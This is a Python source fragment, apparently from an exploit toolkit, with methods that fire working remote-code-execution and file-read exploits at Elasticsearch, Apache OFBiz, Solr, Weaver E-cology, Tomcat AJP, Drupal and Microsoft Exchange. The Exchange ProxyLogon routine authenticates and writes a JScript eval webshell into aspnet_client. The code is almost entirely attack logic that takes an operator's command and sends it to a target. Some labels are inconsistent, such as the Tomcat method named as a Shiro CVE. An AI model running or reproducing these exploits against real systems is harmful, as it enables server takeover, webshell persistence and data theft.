def cve_2015_1427_exp(self, cmd):
vul_name = "Elasticsearch: CVE-2015-1427"
self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
self.host = self.hostname + ":" + str(self.port)
self.headers_text = {
'Host': "" + self.host,
'Accept': '*/*',
'Connection': 'close',
'Accept-Language': 'en',
'User-Agent': self.ua,
'Content-Type': 'application/text'
}
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers_text,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
except IndexError:
self.r = "null"
raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2021_30128_exp(self, cmd):
vul_name = "Apache OFBiz: CVE-2021-30128"
headers = {
'User-Agent': self.ua,
'Content-Type': 'text/xml',
'Connection': 'close'
}
def _trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
try:
dns_data = bytes(cmd, encoding="utf8")
dns_hex = _trans(dns_data)
#print(cmd)
#print(dns_hex)
data = self.payload_cve_2021_30128_exp.replace(
"RECOMMAND", dns_hex)
url = urljoin(self.url, "/webtools/control/SOAPService")
#print(data)
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if request.status_code == 200:
r = "Command Executed Successfully (But No Echo)"
else:
r = "Command Executed Failed... ..."
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2019_17558_exp(self, cmd):
vul_name = "Apache Solr: CVE-2019-17558"
core_name = None
payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except AttributeError:
pass
url_api = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {'Content-Type': 'application/json', 'User-Agent': self.ua}
set_api_data = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
"""
request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False)
request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers,
timeout=self.timeout, verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def time_2021_0515_exp(self, cmd):
vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
url = urljoin(self.url, "/services%20/WorkflowServiceXml")
headers = {
'User-Agent': self.ua,
'SOAPAction': '""',
'cmd': cmd,
"Content-Type": "text/xml;charset=UTF-8"
}
data = self.payload_time_2021_0515
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2020_1938_exp(self, file):
vul_name = "Apache Shiro: CVE-2016-4437"
headers = self.headers
self.output_method = "ajp"
self.default_port = self.port
self.default_requri = '/'
self.default_headers = {}
self.username = None
self.password = None
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.request = "null"
raw_data = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \
">_< So there is no HTTP protocol request and response"
try:
socket.setdefaulttimeout(self.timeout)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.connect((self.hostname, self.default_port))
self.stream = self.socket.makefile("rb",
buffering=0) # PY2: bufsize=0
self.attributes = [
{
'name': 'req_attribute',
'value': ['javax.servlet.include.request_uri', '/']
},
{
'name': 'req_attribute',
'value': ['javax.servlet.include.path_info', file]
},
{
'name': 'req_attribute',
'value': ['javax.servlet.include.servlet_path', '/']
},
]
method = 'GET'
self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
self,
self.hostname,
self.default_requri,
method=AjpForwardRequest.REQUEST_METHODS.get(method))
if self.username is not None and self.password is not None:
self.forward_request.request_headers[
'SC_REQ_AUTHORIZATION'] = "Basic " + str(
("%s:%s" % (self.username, self.password)
).encode('base64').replace("\n"
""))
for h in self.default_headers:
self.forward_request.request_headers[h] = headers[h]
for a in self.attributes:
self.forward_request.attributes.append(a)
self.responses = self.forward_request.send_and_receive(
self.socket, self.stream)
if len(self.responses) == 0:
return None, None
self.snd_hdrs_res = self.responses[0]
self.data_res = self.responses[1:-1]
self.request = (b"".join([d.data for d in self.data_res]).decode())
verify.exploit_print(self.request, raw_data)
except socket.timeout:
verify.timeout_print(vul_name)
except Exception as error:
verify.error_print(vul_name)
def cve_2018_7602_exp(self, cmd):
vul_name = "Drupal: CVE-2018-7602"
DRUPAL_U = "admin"
DRUPAL_P = "admin"
try:
self.session = requests.Session()
self.get_params = {'q': 'user/login'}
self.post_params = {
'form_id': 'user_login',
'name': DRUPAL_U,
'pass': DRUPAL_P,
'op': 'Log in'
}
self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.get_params = {'q': 'user'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.user_id = self.soup.find('meta', {
'property': 'foaf:name'
}).get('about')
if "?q=" in self.user_id:
self.user_id = self.user_id.split("=")[1]
self.get_params = {'q': self.user_id + '/cancel'}
self.r = self.session.get(self.url,
params=self.get_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_token = self.form.find('input', {
'name': 'form_token'
}).get('value')
self.get_params = {
'q':
self.user_id + '/cancel',
'destination':
self.user_id +
'/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
+ cmd
}
self.post_params = {
'form_id': 'user_cancel_confirm_form',
'form_token': self.form_token,
'_triggering_element_name': 'form_id',
'op': 'Cancel account'
}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.soup = BeautifulSoup(self.r.text, "html.parser")
self.form = self.soup.find('form',
{'id': 'user-cancel-confirm-form'})
self.form_build_id = self.form.find('input', {
'name': 'form_build_id'
}).get('value')
self.get_params = {
'q':
'file/ajax/actions/cancel/#options/path/' + self.form_build_id
}
self.post_params = {'form_build_id': self.form_build_id}
self.r = self.session.post(self.url,
params=self.get_params,
data=self.post_params,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
verify.exploit_print(self.r.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_27065_exp(self, cmd, file, email):
vul_name = "Microsoft Exchange: CVE-2021-27065"
FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\' + file
FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["v"],"unsafe");}</script>'
def __unpack_str(byte_string):
return byte_string.decode('UTF-8').replace('\x00', '')
def __unpack_int(format, data):
return unpack(format, data)[0]
def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
cookies = list(cookies)
cookies.extend([
'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
])
if not headers:
headers = {'Content-Type': 'application/json'}
headers['Cookie'] = ';'.join(cookies)
headers['msExchLogonMailbox'] = 'S-1-5-20'
try:
r = requests.post(url + "/ecp/y.js",
headers=headers,
data=data,
verify=False,
allow_redirects=False)
return r
except:
return False
def _get_sid(url, name, mail):
payload = '''
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
''' % mail
headers = {
'User-Agent': 'ExchangeServicesClient/0.0.0.0',
'Content-Type': 'text/xml'
}
r = __exploit(url,
name,
'/autodiscover/autodiscover.xml',
qs='',
data=payload,
headers=headers)
res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
if res:
headers = {
'X-Clientapplication': 'Outlook/15.0.4815.1002',
'X-Requestid': 'x',
'X-Requesttype': 'Connect',
'Content-Type': 'application/mapi-http',
}
legacyDN = res.group(1)
payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
r = __exploit(url,
name,
'/mapi/emsmdb/',
qs='',
data=payload,
headers=headers)
res = re.search('with SID ([S\-0-9]+) ', r.text)
if res:
return res.group(1)
else:
return False
else:
return False
def _parse_challenge(auth):
target_info_field = auth[40:48]
target_info_len = __unpack_int('H', target_info_field[0:2])
target_info_offset = __unpack_int('I', target_info_field[4:8])
target_info_bytes = auth[target_info_offset:target_info_offset +
target_info_len]
domain_name = ''
computer_name = ''
info_offset = 0
while info_offset < len(target_info_bytes):
av_id = __unpack_int(
'H', target_info_bytes[info_offset:info_offset + 2])
av_len = __unpack_int(
'H', target_info_bytes[info_offset + 2:info_offset + 4])
av_value = target_info_bytes[info_offset + 4:info_offset + 4 +
av_len]
info_offset = info_offset + 4 + av_len
if av_id == 2: # MsvAvDnsDomainName
domain_name = __unpack_str(av_value)
elif av_id == 3: # MsvAvDnsComputerName
computer_name = __unpack_str(av_value)
return domain_name, computer_name
def _get_email(url):
try:
url = get_fld(url)
return url
except:
return "unkonw"
try:
MAIL = email
print('[+] Test Email =', MAIL)
# Getting ComputerName and DomainName
url = self.url + "/rpc/"
ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
r = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
assert r.status_code == 401, "Error while getting ComputerName"
auth_header = r.headers['WWW-Authenticate']
auth = re.search('Negotiate ([A-Za-z0-9/+=]+)',
auth_header).group(1)
domain_name, computer_name = _parse_challenge(b64decode(auth))
print('[*] Domain Name =', domain_name)
print('[*] Computer Name =', computer_name)
NAME = computer_name
# get SID
sid = _get_sid(self.url, NAME, MAIL)
print('[*] Login sid =', sid)
payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (
MAIL.split('@')[0], sid)
r = __exploit(self.url,
NAME,
'/ecp/proxyLogon.ecp',
qs='',
data=payload)
session_id = r.cookies.get('ASP.NET_SessionId')
canary = r.cookies.get('msExchEcpCanary')
print('[*] get ASP.NET_SessionId =', session_id)
print('[*] get msExchEcpCanary =', canary)
try:
extra_cookies = [
'ASP.NET_SessionId=' + session_id,
'msExchEcpCanary=' + canary
]
except:
extra_cookies = [
'ASP.NET_SessionId=' + str(session_id),
'msExchEcpCanary=' + str(canary)
]
# Getting OAB information
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/GetObject',
qs=qs,
data='',
cookies=extra_cookies)
try:
identity = r.json()['d']['Output'][0]['Identity']
print('[*] OAB Name', identity['DisplayName'])
print('[*] OAB ID ', identity['RawIdentity'])
except:
identity = False
print('[*] Setting up webshell payload through OAB')
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
payload = json.dumps({
'identity': {
'__type': 'Identity:ECP',
'DisplayName': identity['DisplayName'],
'RawIdentity': identity['RawIdentity']
},
'properties': {
'Parameters': {
'__type':
'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
'ExternalUrl': 'http://f/' + FILE_DATA
}
}
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/SetObject',
qs=qs,
data=payload,
cookies=extra_cookies)
if r.status_code == 200:
print('[*] Writing shell')
qs = urlencode({
'schema': 'ResetOABVirtualDirectory',
'msExchEcpCanary': canary
})
payload = json.dumps({
'identity': {
'__type': 'Identity:ECP',
'DisplayName': identity['DisplayName'],
'RawIdentity': identity['RawIdentity']
},
'properties': {
'Parameters': {
'__type':
'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
'FilePathName': FILE_PATH
}
}
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/SetObject',
qs=qs,
data=payload,
cookies=extra_cookies)
# Set-OABVirtualDirectory
print('[*] Cleaning OAB')
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
payload = json.dumps({
'identity': {
'__type': 'Identity:ECP',
'DisplayName': identity['DisplayName'],
'RawIdentity': identity['RawIdentity']
},
'properties': {
'Parameters': {
'__type':
'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
'ExternalUrl': ''
}
}
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/SetObject',
qs=qs,
data=payload,
cookies=extra_cookies)
up = '[+] upload webshell is ' + self.url + "/aspnet_client/" + file
self.raw_data = dump.dump_all(r).decode('utf-8', 'ignore')
verify.exploit_print(up, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
